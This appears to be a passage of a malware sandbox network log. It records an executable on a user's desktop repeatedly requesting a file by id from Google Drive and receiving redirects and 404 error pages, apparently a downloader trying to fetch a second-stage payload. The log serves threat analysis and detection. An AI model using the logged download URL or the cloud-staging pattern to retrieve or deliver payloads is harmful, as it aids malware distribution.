                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                9192.168.2.749903142.250.181.14435064C:\Users\user\Desktop\ME-SPC-94.03.60.175.07.exe
                                                TimestampBytes transferredDirectionData
                                                2024-12-16 17:06:49 UTC460OUTGET /download?id=13wRg_8Xhzr_sWcuFAXcTmEgMjQKIGEz3&export=download HTTP/1.1
                                                User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:131.0) Gecko/20100101 Firefox/131.0
                                                Cache-Control: no-cache
                                                Host: drive.usercontent.google.com
                                                Connection: Keep-Alive
                                                Cookie: NID=520=nxxPxm2W5Xf-aykbzj5oq-nHIKkwnWYS3_4aSh4Xgib2rIRIc7HHZs5IMg16Prb3ow1YhSv0aOFcQTEfkNGf-d-TBgBqjRREw9rErop35FthvCShFj7qlhk0r6LXclgzDss2lEamOb3a578OpzRwpBfA4_Q7YLFkEAY7U_hsvnCEb-YuYMKfy40W
                                                2024-12-16 17:06:50 UTC1844INHTTP/1.1 404 Not Found
                                                X-GUploader-UploadID: AFiumC7dQE9ZmoXTY5c_KfSk0aHr0ZXPqHFBVuMQAfqu6FrtHKXwsgmKed4tHol8b7DsOSfG
                                                Content-Type: text/html; charset=utf-8
                                                Cache-Control: no-cache, no-store, max-age=0, must-revalidate
                                                Pragma: no-cache
                                                Expires: Mon, 01 Jan 1990 00:00:00 GMT
                                                Date: Mon, 16 Dec 2024 17:06:49 GMT
                                                Permissions-Policy: ch-ua-arch=*, ch-ua-bitness=*, ch-ua-full-version=*, ch-ua-full-version-list=*, ch-ua-model=*, ch-ua-wow64=*, ch-ua-form-factors=*, ch-ua-platform=*, ch-ua-platform-version=*
                                                Cross-Origin-Opener-Policy: same-origin
                                                Content-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreport
                                                Content-Security-Policy: script-src 'nonce-D8mHoRdbOaOXCdzqSs6Dcg' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self'
                                                Content-Security-Policy: script-src 'unsafe-inline' 'unsafe-eval' blob: data: 'self' https://apis.google.com https://ssl.gstatic.com https://www.google.com https://www.googletagmanager.com https://www.gstatic.com https://www.google-analytics.com;report-uri /_/DriveUntrustedContentHttp/cspreport/allowlist
                                                Accept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-WoW64, Sec-CH-UA-Form-Factors, Sec-CH-UA-Platform, Sec-CH-UA-Platform-Version
                                                Content-Security-Policy-Report-Only: script-src 'unsafe-inline' 'unsafe-eval' blob: data: https://translate.google.com/translate_a/element.js https://www.google-analytics.com/analytics.js https://translate.googleapis.com/_/translate_http/_/js/;report-uri /_/DriveUntrustedContentHttp/cspreport/fine-allowlist
                                                Content-Length: 1652
                                                Server: UploadServer
                                                Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000
                                                Content-Security-Policy: sandbox allow-scripts
                                                Connection: close
                                                2024-12-16 17:06:50 UTC1652INData Raw: 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 22 20 64 69 72 3d 6c 74 72 3e 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 75 74 66 2d 38 3e 3c 6d 65 74 61 20 6e 61 6d 65 3d 76 69 65 77 70 6f 72 74 20 63 6f 6e 74 65 6e 74 3d 22 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2c 20 6d 69 6e 69 6d 75 6d 2d 73 63 61 6c 65 3d 31 2c 20 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 22 3e 3c 74 69 74 6c 65 3e 45 72 72 6f 72 20 34 30 34 20 28 4e 6f 74 20 46 6f 75 6e 64 29 21 21 31 3c 2f 74 69 74 6c 65 3e 3c 73 74 79 6c 65 20 6e 6f 6e 63 65 3d 22 51 5a 72 4a 5f 66 65 48 42 49 62 6e 64 77 68 6b 4f 75 4a 41 2d 67 22 3e 2a 7b 6d 61 72 67 69 6e 3a 30 3b 70 61 64 64 69 6e 67 3a 30 7d 68 74 6d 6c 2c 63 6f 64 65 7b 66 6f 6e 74 3a 31 35 70 78 2f 32 32 70 78 20 61 72 69 61 6c
                                                Data Ascii: <html lang="en" dir=ltr><meta charset=utf-8><meta name=viewport content="initial-scale=1, minimum-scale=1, width=device-width"><title>Error 404 (Not Found)!!1</title><style nonce="QZrJ_feHBIbndwhkOuJA-g">*{margin:0;padding:0}html,code{font:15px/22px arial


                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                10192.168.2.749932172.217.19.1744435064C:\Users\user\Desktop\ME-SPC-94.03.60.175.07.exe
                                                TimestampBytes transferredDirectionData
                                                2024-12-16 17:07:02 UTC418OUTGET /uc?export=download&id=13wRg_8Xhzr_sWcuFAXcTmEgMjQKIGEz3 HTTP/1.1
                                                User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:131.0) Gecko/20100101 Firefox/131.0
                                                Host: drive.google.com
                                                Cache-Control: no-cache
                                                Cookie: NID=520=nxxPxm2W5Xf-aykbzj5oq-nHIKkwnWYS3_4aSh4Xgib2rIRIc7HHZs5IMg16Prb3ow1YhSv0aOFcQTEfkNGf-d-TBgBqjRREw9rErop35FthvCShFj7qlhk0r6LXclgzDss2lEamOb3a578OpzRwpBfA4_Q7YLFkEAY7U_hsvnCEb-YuYMKfy40W
                                                2024-12-16 17:07:02 UTC1920INHTTP/1.1 303 See Other
                                                Content-Type: application/binary
                                                Cache-Control: no-cache, no-store, max-age=0, must-revalidate
                                                Pragma: no-cache
                                                Expires: Mon, 01 Jan 1990 00:00:00 GMT
                                                Date: Mon, 16 Dec 2024 17:07:02 GMT
                                                Location: https://drive.usercontent.google.com/download?id=13wRg_8Xhzr_sWcuFAXcTmEgMjQKIGEz3&export=download
                                                Strict-Transport-Security: max-age=31536000
                                                Accept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-WoW64, Sec-CH-UA-Form-Factors, Sec-CH-UA-Platform, Sec-CH-UA-Platform-Version
                                                Permissions-Policy: ch-ua-arch=*, ch-ua-bitness=*, ch-ua-full-version=*, ch-ua-full-version-list=*, ch-ua-model=*, ch-ua-wow64=*, ch-ua-form-factors=*, ch-ua-platform=*, ch-ua-platform-version=*
                                                Cross-Origin-Opener-Policy: same-origin
                                                Content-Security-Policy: script-src 'nonce-195avlmyn71xrxO0dy3RBw' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self'
                                                Content-Security-Policy: script-src 'unsafe-inline' 'unsafe-eval' blob: data: 'self' https://apis.google.com https://ssl.gstatic.com https://www.google.com https://www.googletagmanager.com https://www.gstatic.com https://www.google-analytics.com;report-uri /_/DriveUntrustedContentHttp/cspreport/allowlist
                                                Content-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreport
                                                Content-Security-Policy-Report-Only: script-src 'unsafe-inline' 'unsafe-eval' blob: data: https://translate.google.com/translate_a/element.js https://www.google-analytics.com/analytics.js https://translate.googleapis.com/_/translate_http/_/js/;report-uri /_/DriveUntrustedContentHttp/cspreport/fine-allowlist
                                                Server: ESF
                                                Content-Length: 0
                                                X-XSS-Protection: 0
                                                X-Frame-Options: SAMEORIGIN
                                                X-Content-Type-Options: nosniff
                                                Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000
                                                Connection: close


                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                11192.168.2.749940142.250.181.14435064C:\Users\user\Desktop\ME-SPC-94.03.60.175.07.exe
                                                TimestampBytes transferredDirectionData
                                                2024-12-16 17:07:04 UTC460OUTGET /download?id=13wRg_8Xhzr_sWcuFAXcTmEgMjQKIGEz3&export=download HTTP/1.1
                                                User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:131.0) Gecko/20100101 Firefox/131.0
                                                Cache-Control: no-cache
                                                Host: drive.usercontent.google.com
                                                Connection: Keep-Alive
                                                Cookie: NID=520=nxxPxm2W5Xf-aykbzj5oq-nHIKkwnWYS3_4aSh4Xgib2rIRIc7HHZs5IMg16Prb3ow1YhSv0aOFcQTEfkNGf-d-TBgBqjRREw9rErop35FthvCShFj7qlhk0r6LXclgzDss2lEamOb3a578OpzRwpBfA4_Q7YLFkEAY7U_hsvnCEb-YuYMKfy40W
                                                2024-12-16 17:07:05 UTC1844INHTTP/1.1 404 Not Found
                                                X-GUploader-UploadID: AFiumC69WkwGn1nrZNVaYLTEDd5enm01Ywf_-Uqvx6me1gA7QE2cqedW5q16lbOxgoqg5bJW
                                                Content-Type: text/html; charset=utf-8
                                                Cache-Control: no-cache, no-store, max-age=0, must-revalidate
                                                Pragma: no-cache
                                                Expires: Mon, 01 Jan 1990 00:00:00 GMT
                                                Date: Mon, 16 Dec 2024 17:07:05 GMT
                                                Cross-Origin-Opener-Policy: same-origin
                                                Accept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-WoW64, Sec-CH-UA-Form-Factors, Sec-CH-UA-Platform, Sec-CH-UA-Platform-Version
                                                Permissions-Policy: ch-ua-arch=*, ch-ua-bitness=*, ch-ua-full-version=*, ch-ua-full-version-list=*, ch-ua-model=*, ch-ua-wow64=*, ch-ua-form-factors=*, ch-ua-platform=*, ch-ua-platform-version=*
                                                Content-Security-Policy: script-src 'nonce--VZf7RBcyyRT2cLW7twrKw' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self'
                                                Content-Security-Policy: script-src 'unsafe-inline' 'unsafe-eval' blob: data: 'self' https://apis.google.com https://ssl.gstatic.com https://www.google.com https://www.googletagmanager.com https://www.gstatic.com https://www.google-analytics.com;report-uri /_/DriveUntrustedContentHttp/cspreport/allowlist
                                                Content-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreport
                                                Content-Security-Policy-Report-Only: script-src 'unsafe-inline' 'unsafe-eval' blob: data: https://translate.google.com/translate_a/element.js https://www.google-analytics.com/analytics.js https://translate.googleapis.com/_/translate_http/_/js/;report-uri /_/DriveUntrustedContentHttp/cspreport/fine-allowlist
                                                Content-Length: 1652
                                                Server: UploadServer
                                                Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000
                                                Content-Security-Policy: sandbox allow-scripts
                                                Connection: close
                                                2024-12-16 17:07:05 UTC1652INData Raw: 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 22 20 64 69 72 3d 6c 74 72 3e 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 75 74 66 2d 38 3e 3c 6d 65 74 61 20 6e 61 6d 65 3d 76 69 65 77 70 6f 72 74 20 63 6f 6e 74 65 6e 74 3d 22 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2c 20 6d 69 6e 69 6d 75 6d 2d 73 63 61 6c 65 3d 31 2c 20 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 22 3e 3c 74 69 74 6c 65 3e 45 72 72 6f 72 20 34 30 34 20 28 4e 6f 74 20 46 6f 75 6e 64 29 21 21 31 3c 2f 74 69 74 6c 65 3e 3c 73 74 79 6c 65 20 6e 6f 6e 63 65 3d 22 75 59 45 65 38 58 6e 76 4f 32 66 79 37 59 70 65 53 4b 4e 76 45 51 22 3e 2a 7b 6d 61 72 67 69 6e 3a 30 3b 70 61 64 64 69 6e 67 3a 30 7d 68 74 6d 6c 2c 63 6f 64 65 7b 66 6f 6e 74 3a 31 35 70 78 2f 32 32 70 78 20 61 72 69 61 6c
                                                Data Ascii: <html lang="en" dir=ltr><meta charset=utf-8><meta name=viewport content="initial-scale=1, minimum-scale=1, width=device-width"><title>Error 404 (Not Found)!!1</title><style nonce="uYEe8XnvO2fy7YpeSKNvEQ">*{margin:0;padding:0}html,code{font:15px/22px arial


                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                12192.168.2.749969172.217.19.1744435064C:\Users\user\Desktop\ME-SPC-94.03.60.175.07.exe
                                                TimestampBytes transferredDirectionData
                                                2024-12-16 17:07:17 UTC418OUTGET /uc?export=download&id=13wRg_8Xhzr_sWcuFAXcTmEgMjQKIGEz3 HTTP/1.1
                                                User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:131.0) Gecko/20100101 Firefox/131.0
                                                Host: drive.google.com
                                                Cache-Control: no-cache
                                                Cookie: NID=520=nxxPxm2W5Xf-aykbzj5oq-nHIKkwnWYS3_4aSh4Xgib2rIRIc7HHZs5IMg16Prb3ow1YhSv0aOFcQTEfkNGf-d-TBgBqjRREw9rErop35FthvCShFj7qlhk0r6LXclgzDss2lEamOb3a578OpzRwpBfA4_Q7YLFkEAY7U_hsvnCEb-YuYMKfy40W
                                                2024-12-16 17:07:18 UTC1920INHTTP/1.1 303 See Other
                                                Content-Type: application/binary
                                                Cache-Control: no-cache, no-store, max-age=0, must-revalidate
                                                Pragma: no-cache
                                                Expires: Mon, 01 Jan 1990 00:00:00 GMT
                                                Date: Mon, 16 Dec 2024 17:07:17 GMT
                                                Location: https://drive.usercontent.google.com/download?id=13wRg_8Xhzr_sWcuFAXcTmEgMjQKIGEz3&export=download
                                                Strict-Transport-Security: max-age=31536000
                                                Cross-Origin-Opener-Policy: same-origin
                                                Permissions-Policy: ch-ua-arch=*, ch-ua-bitness=*, ch-ua-full-version=*, ch-ua-full-version-list=*, ch-ua-model=*, ch-ua-wow64=*, ch-ua-form-factors=*, ch-ua-platform=*, ch-ua-platform-version=*
                                                Accept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-WoW64, Sec-CH-UA-Form-Factors, Sec-CH-UA-Platform, Sec-CH-UA-Platform-Version
                                                Content-Security-Policy: script-src 'nonce-btGtKWTR1T9R_5IboO_tuA' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self'
                                                Content-Security-Policy: script-src 'unsafe-inline' 'unsafe-eval' blob: data: 'self' https://apis.google.com https://ssl.gstatic.com https://www.google.com https://www.googletagmanager.com https://www.gstatic.com https://www.google-analytics.com;report-uri /_/DriveUntrustedContentHttp/cspreport/allowlist
                                                Content-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreport
                                                Content-Security-Policy-Report-Only: script-src 'unsafe-inline' 'unsafe-eval' blob: data: https://translate.google.com/translate_a/element.js https://www.google-analytics.com/analytics.js https://translate.googleapis.com/_/translate_http/_/js/;report-uri /_/DriveUntrustedContentHttp/cspreport/fine-allowlist
                                                Server: ESF
                                                Content-Length: 0
                                                X-XSS-Protection: 0
                                                X-Frame-Options: SAMEORIGIN
                                                X-Content-Type-Options: nosniff
                                                Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000
                                                Connection: close


                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                13192.168.2.749975142.250.181.14435064C:\Users\user\Desktop\ME-SPC-94.03.60.175.07.exe
                                                TimestampBytes transferredDirectionData
                                                2024-12-16 17:07:19 UTC460OUTGET /download?id=13wRg_8Xhzr_sWcuFAXcTmEgMjQKIGEz3&export=download HTTP/1.1
                                                User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:131.0) Gecko/20100101 Firefox/131.0
                                                Cache-Control: no-cache
                                                Host: drive.usercontent.google.com
                                                Connection: Keep-Alive
                                                Cookie: NID=520=nxxPxm2W5Xf-aykbzj5oq-nHIKkwnWYS3_4aSh4Xgib2rIRIc7HHZs5IMg16Prb3ow1YhSv0aOFcQTEfkNGf-d-TBgBqjRREw9rErop35FthvCShFj7qlhk0r6LXclgzDss2lEamOb3a578OpzRwpBfA4_Q7YLFkEAY7U_hsvnCEb-YuYMKfy40W
                                                2024-12-16 17:07:21 UTC1844INHTTP/1.1 404 Not Found
                                                X-GUploader-UploadID: AFiumC7F1E-Zh1ZL9IpsID0C0hWGFdKUkTFt7qdokeUhMYlZatP6iwdr3RuDDBgaMMnQxkWa
                                                Content-Type: text/html; charset=utf-8
                                                Cache-Control: no-cache, no-store, max-age=0, must-revalidate
                                                Pragma: no-cache
                                                Expires: Mon, 01 Jan 1990 00:00:00 GMT
                                                Date: Mon, 16 Dec 2024 17:07:20 GMT
                                                Content-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreport
                                                Content-Security-Policy: script-src 'nonce-62BzG4TWsxQvIl69A0r0Sw' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self'
                                                Content-Security-Policy: script-src 'unsafe-inline' 'unsafe-eval' blob: data: 'self' https://apis.google.com https://ssl.gstatic.com https://www.google.com https://www.googletagmanager.com https://www.gstatic.com https://www.google-analytics.com;report-uri /_/DriveUntrustedContentHttp/cspreport/allowlist
                                                Content-Security-Policy-Report-Only: script-src 'unsafe-inline' 'unsafe-eval' blob: data: https://translate.google.com/translate_a/element.js https://www.google-analytics.com/analytics.js https://translate.googleapis.com/_/translate_http/_/js/;report-uri /_/DriveUntrustedContentHttp/cspreport/fine-allowlist
                                                Accept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-WoW64, Sec-CH-UA-Form-Factors, Sec-CH-UA-Platform, Sec-CH-UA-Platform-Version
                                                Permissions-Policy: ch-ua-arch=*, ch-ua-bitness=*, ch-ua-full-version=*, ch-ua-full-version-list=*, ch-ua-model=*, ch-ua-wow64=*, ch-ua-form-factors=*, ch-ua-platform=*, ch-ua-platform-version=*
                                                Cross-Origin-Opener-Policy: same-origin
                                                Content-Length: 1652
                                                Server: UploadServer
                                                Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000
                                                Content-Security-Policy: sandbox allow-scripts
                                                Connection: close
                                                2024-12-16 17:07:21 UTC1652INData Raw: 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 22 20 64 69 72 3d 6c 74 72 3e 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 75 74 66 2d 38 3e 3c 6d 65 74 61 20 6e 61 6d 65 3d 76 69 65 77 70 6f 72 74 20 63 6f 6e 74 65 6e 74 3d 22 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2c 20 6d 69 6e 69 6d 75 6d 2d 73 63 61 6c 65 3d 31 2c 20 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 22 3e 3c 74 69 74 6c 65 3e 45 72 72 6f 72 20 34 30 34 20 28 4e 6f 74 20 46 6f 75 6e 64 29 21 21 31 3c 2f 74 69 74 6c 65 3e 3c 73 74 79 6c 65 20 6e 6f 6e 63 65 3d 22 6b 67 73 39 74 68 58 43 4d 6f 34 6c 63 4e 44 6b 6e 63 33 65 55 41 22 3e 2a 7b 6d 61 72 67 69 6e 3a 30 3b 70 61 64 64 69 6e 67 3a 30 7d 68 74 6d 6c 2c 63 6f 64 65 7b 66 6f 6e 74 3a 31 35 70 78 2f 32 32 70 78 20 61 72 69 61 6c
                                                Data Ascii: <html lang="en" dir=ltr><meta charset=utf-8><meta name=viewport content="initial-scale=1, minimum-scale=1, width=device-width"><title>Error 404 (Not Found)!!1</title><style nonce="kgs9thXCMo4lcNDknc3eUA">*{margin:0;padding:0}html,code{font:15px/22px arial


                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                14192.168.2.749986172.217.19.1744435064C:\Users\user\Desktop\ME-SPC-94.03.60.175.07.exe
                                                TimestampBytes transferredDirectionData
                                                2024-12-16 17:07:33 UTC418OUTGET /uc?export=download&id=13wRg_8Xhzr_sWcuFAXcTmEgMjQKIGEz3 HTTP/1.1
                                                User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:131.0) Gecko/20100101 Firefox/131.0
                                                Host: drive.google.com
                                                Cache-Control: no-cache
                                                Cookie: NID=520=nxxPxm2W5Xf-aykbzj5oq-nHIKkwnWYS3_4aSh4Xgib2rIRIc7HHZs5IMg16Prb3ow1YhSv0aOFcQTEfkNGf-d-TBgBqjRREw9rErop35FthvCShFj7qlhk0r6LXclgzDss2lEamOb3a578OpzRwpBfA4_Q7YLFkEAY7U_hsvnCEb-YuYMKfy40W
                                                2024-12-16 17:07:34 UTC1920INHTTP/1.1 303 See Other
                                                Content-Type: application/binary
                                                Cache-Control: no-cache, no-store, max-age=0, must-revalidate
                                                Pragma: no-cache
                                                Expires: Mon, 01 Jan 1990 00:00:00 GMT
                                                Date: Mon, 16 Dec 2024 17:07:34 GMT
                                                Location: https://drive.usercontent.google.com/download?id=13wRg_8Xhzr_sWcuFAXcTmEgMjQKIGEz3&export=download
                                                Strict-Transport-Security: max-age=31536000
                                                Cross-Origin-Opener-Policy: same-origin
                                                Permissions-Policy: ch-ua-arch=*, ch-ua-bitness=*, ch-ua-full-version=*, ch-ua-full-version-list=*, ch-ua-model=*, ch-ua-wow64=*, ch-ua-form-factors=*, ch-ua-platform=*, ch-ua-platform-version=*
                                                Accept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-WoW64, Sec-CH-UA-Form-Factors, Sec-CH-UA-Platform, Sec-CH-UA-Platform-Version
                                                Content-Security-Policy: script-src 'nonce-3Uk5rr6H0jZsMWkBbhTjJw' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self'
                                                Content-Security-Policy: script-src 'unsafe-inline' 'unsafe-eval' blob: data: 'self' https://apis.google.com https://ssl.gstatic.com https://www.google.com https://www.googletagmanager.com https://www.gstatic.com https://www.google-analytics.com;report-uri /_/DriveUntrustedContentHttp/cspreport/allowlist
                                                Content-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreport
                                                Content-Security-Policy-Report-Only: script-src 'unsafe-inline' 'unsafe-eval' blob: data: https://translate.google.com/translate_a/element.js https://www.google-analytics.com/analytics.js https://translate.googleapis.com/_/translate_http/_/js/;report-uri /_/DriveUntrustedContentHttp/cspreport/fine-allowlist
                                                Server: ESF
                                                Content-Length: 0
                                                X-XSS-Protection: 0
                                                X-Frame-Options: SAMEORIGIN
                                                X-Content-Type-Options: nosniff
                                                Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000
                                                Connection: close


                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                15192.168.2.749987142.250.181.14435064C:\Users\user\Desktop\ME-SPC-94.03.60.175.07.exe
                                                TimestampBytes transferredDirectionData
                                                2024-12-16 17:07:36 UTC460OUTGET /download?id=13wRg_8Xhzr_sWcuFAXcTmEgMjQKIGEz3&export=download HTTP/1.1
                                                User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:131.0) Gecko/20100101 Firefox/131.0
                                                Cache-Control: no-cache
                                                Host: drive.usercontent.google.com
                                                Connection: Keep-Alive
                                                Cookie: NID=520=nxxPxm2W5Xf-aykbzj5oq-nHIKkwnWYS3_4aSh4Xgib2rIRIc7HHZs5IMg16Prb3ow1YhSv0aOFcQTEfkNGf-d-TBgBqjRREw9rErop35FthvCShFj7qlhk0r6LXclgzDss2lEamOb3a578OpzRwpBfA4_Q7YLFkEAY7U_hsvnCEb-YuYMKfy40W
                                                2024-12-16 17:07:37 UTC1844INHTTP/1.1 404 Not Found
                                                X-GUploader-UploadID: AFiumC4lUVYmUhluXEdI1vkLA4mMAjB6bKsc1j-RUZ0hN61c68LyRrTPsZsbaDc12Qwrmhph
                                                Content-Type: text/html; charset=utf-8
                                                Cache-Control: no-cache, no-store, max-age=0, must-revalidate
                                                Pragma: no-cache
                                                Expires: Mon, 01 Jan 1990 00:00:00 GMT
                                                Date: Mon, 16 Dec 2024 17:07:37 GMT
                                                Accept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-WoW64, Sec-CH-UA-Form-Factors, Sec-CH-UA-Platform, Sec-CH-UA-Platform-Version
                                                Cross-Origin-Opener-Policy: same-origin
                                                Permissions-Policy: ch-ua-arch=*, ch-ua-bitness=*, ch-ua-full-version=*, ch-ua-full-version-list=*, ch-ua-model=*, ch-ua-wow64=*, ch-ua-form-factors=*, ch-ua-platform=*, ch-ua-platform-version=*
                                                Content-Security-Policy: script-src 'nonce-PDAiOeofzBXYm-xFOcPkEA' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self'
                                                Content-Security-Policy: script-src 'unsafe-inline' 'unsafe-eval' blob: data: 'self' https://apis.google.com https://ssl.gstatic.com https://www.google.com https://www.googletagmanager.com https://www.gstatic.com https://www.google-analytics.com;report-uri /_/DriveUntrustedContentHttp/cspreport/allowlist
                                                Content-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreport
                                                Content-Security-Policy-Report-Only: script-src 'unsafe-inline' 'unsafe-eval' blob: data: https://translate.google.com/translate_a/element.js https://www.google-analytics.com/analytics.js https://translate.googleapis.com/_/translate_http/_/js/;report-uri /_/DriveUntrustedContentHttp/cspreport/fine-allowlist
                                                Content-Length: 1652
                                                Server: UploadServer
                                                Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000
                                                Content-Security-Policy: sandbox allow-scripts
                                                Connection: close
                                                2024-12-16 17:07:37 UTC1652INData Raw: 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 22 20 64 69 72 3d 6c 74 72 3e 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 75 74 66 2d 38 3e 3c 6d 65 74 61 20 6e 61 6d 65 3d 76 69 65 77 70 6f 72 74 20 63 6f 6e 74 65 6e 74 3d 22 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2c 20 6d 69 6e 69 6d 75 6d 2d 73 63 61 6c 65 3d 31 2c 20 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 22 3e 3c 74 69 74 6c 65 3e 45 72 72 6f 72 20 34 30 34 20 28 4e 6f 74 20 46 6f 75 6e 64 29 21 21 31 3c 2f 74 69 74 6c 65 3e 3c 73 74 79 6c 65 20 6e 6f 6e 63 65 3d 22 78 76 77 6b 4c 50 4a 50 41 44 74 71 44 6a 68 4f 5f 4f 75 66 5a 51 22 3e 2a 7b 6d 61 72 67 69 6e 3a 30 3b 70 61 64 64 69 6e 67 3a 30 7d 68 74 6d 6c 2c 63 6f 64 65 7b 66 6f 6e 74 3a 31 35 70 78 2f 32 32 70 78 20 61 72 69 61 6c
                                                Data Ascii: <html lang="en" dir=ltr><meta charset=utf-8><meta name=viewport content="initial-scale=1, minimum-scale=1, width=device-width"><title>Error 404 (Not Found)!!1</title><style nonce="xvwkLPJPADtqDjhO_OufZQ">*{margin:0;padding:0}html,code{font:15px/22px arial


                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                16192.168.2.749988172.217.19.1744435064C:\Users\user\Desktop\ME-SPC-94.03.60.175.07.exe
                                                TimestampBytes transferredDirectionData
                                                2024-12-16 17:07:49 UTC418OUTGET /uc?export=download&id=13wRg_8Xhzr_sWcuFAXcTmEgMjQKIGEz3 HTTP/1.1
                                                User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:131.0) Gecko/20100101 Firefox/131.0
                                                Host: drive.google.com
                                                Cache-Control: no-cache
                                                Cookie: NID=520=nxxPxm2W5Xf-aykbzj5oq-nHIKkwnWYS3_4aSh4Xgib2rIRIc7HHZs5IMg16Prb3ow1YhSv0aOFcQTEfkNGf-d-TBgBqjRREw9rErop35FthvCShFj7qlhk0r6LXclgzDss2lEamOb3a578OpzRwpBfA4_Q7YLFkEAY7U_hsvnCEb-YuYMKfy40W
                                                2024-12-16 17:07:50 UTC1920INHTTP/1.1 303 See Other
                                                Content-Type: application/binary
                                                Cache-Control: no-cache, no-store, max-age=0, must-revalidate
                                                Pragma: no-cache
                                                Expires: Mon, 01 Jan 1990 00:00:00 GMT
                                                Date: Mon, 16 Dec 2024 17:07:49 GMT
                                                Location: https://drive.usercontent.google.com/download?id=13wRg_8Xhzr_sWcuFAXcTmEgMjQKIGEz3&export=download
                                                Strict-Transport-Security: max-age=31536000
                                                Cross-Origin-Opener-Policy: same-origin
                                                Content-Security-Policy: script-src 'nonce-Zy-P21aNSe5Br9Zty2x-xA' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self'
                                                Content-Security-Policy: script-src 'unsafe-inline' 'unsafe-eval' blob: data: 'self' https://apis.google.com https://ssl.gstatic.com https://www.google.com https://www.googletagmanager.com https://www.gstatic.com https://www.google-analytics.com;report-uri /_/DriveUntrustedContentHttp/cspreport/allowlist
                                                Content-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreport
